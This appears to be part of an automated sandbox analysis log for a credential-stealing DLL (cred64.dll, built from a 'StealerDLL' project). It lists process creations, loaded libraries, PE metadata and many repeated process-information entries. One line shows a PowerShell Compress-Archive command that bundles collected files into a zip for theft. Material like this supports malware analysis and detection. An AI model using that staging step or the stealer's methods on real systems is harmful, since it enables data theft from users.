    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\loaddll64.exe Section loaded: apphelp.dll
    Source: C:\Windows\System32\loaddll64.exe Section loaded: wininet.dll
    Source: C:\Windows\System32\loaddll64.exe Section loaded: msasn1.dll
    Source: C:\Windows\System32\loaddll64.exe Section loaded: windows.storage.dll
    Source: C:\Windows\System32\loaddll64.exe Section loaded: wldp.dll
    Source: C:\Windows\System32\loaddll64.exe Section loaded: iertutil.dll
    Source: C:\Windows\System32\loaddll64.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
    Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
    Source: Window Recorder Window detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
    Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office
    Source: cred64.dll.dll Static PE information: Image base 0x180000000 > 0x60000000
    Source: cred64.dll.dll Static file information: File size 1281024 > 1048576
    Source: cred64.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: cred64.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: cred64.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: cred64.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: cred64.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: cred64.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: cred64.dll.dll Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbt+. source: powershell.exe, 00000011.00000002.2073544837.000001934FD1C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Automation.pdb source: powershell.exe, 00000015.00000002.2153748068.000001C321304000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000011.00000002.2070821730.000001934FCAE000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000011.00000002.2064588985.000001934FA40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2153160648.000001C32129C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: pdblib.pdb source: powershell.exe, 00000011.00000002.2064588985.000001934FA8B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000011.00000002.2072598626.000001934FCE3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Core.pdb source: powershell.exe, 00000015.00000002.2155215235.000001C321490000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: lib.pdbz source: powershell.exe, 00000015.00000002.2153160648.000001C32129C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: CallSite.Target.pdbe35 source: powershell.exe, 00000011.00000002.2074774615.000001934FD68000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ion.pdb source: powershell.exe, 00000015.00000002.2153748068.000001C3212F3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64.dll.dll
    Source: Binary string: softy.pdbvice source: powershell.exe, 00000011.00000002.2073544837.000001934FD1C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdbk source: powershell.exe, 00000015.00000002.2155215235.000001C321490000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdbA56-E329-4D4D1%0# source: powershell.exe, 00000015.00000002.2155215235.000001C321490000.00000004.00000020.00020000.00000000.sdmp
    Source: cred64.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: cred64.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: cred64.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: cred64.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: cred64.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
    Source: cred64.dll.dll Static PE information: section name: _RDATA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFD9B4D2785 push ebx; iretd 17_2_00007FFD9B4D290A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFD9B4D28FA push ebx; iretd 17_2_00007FFD9B4D290A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFD9B5AC2CB pushfd ; retn 0000h 17_2_00007FFD9B5AC2E1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFD9B5AC2E4 pushfd ; retn 0000h 17_2_00007FFD9B5AC2E5

    Hooking and other Techniques for Hiding and Protection

    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
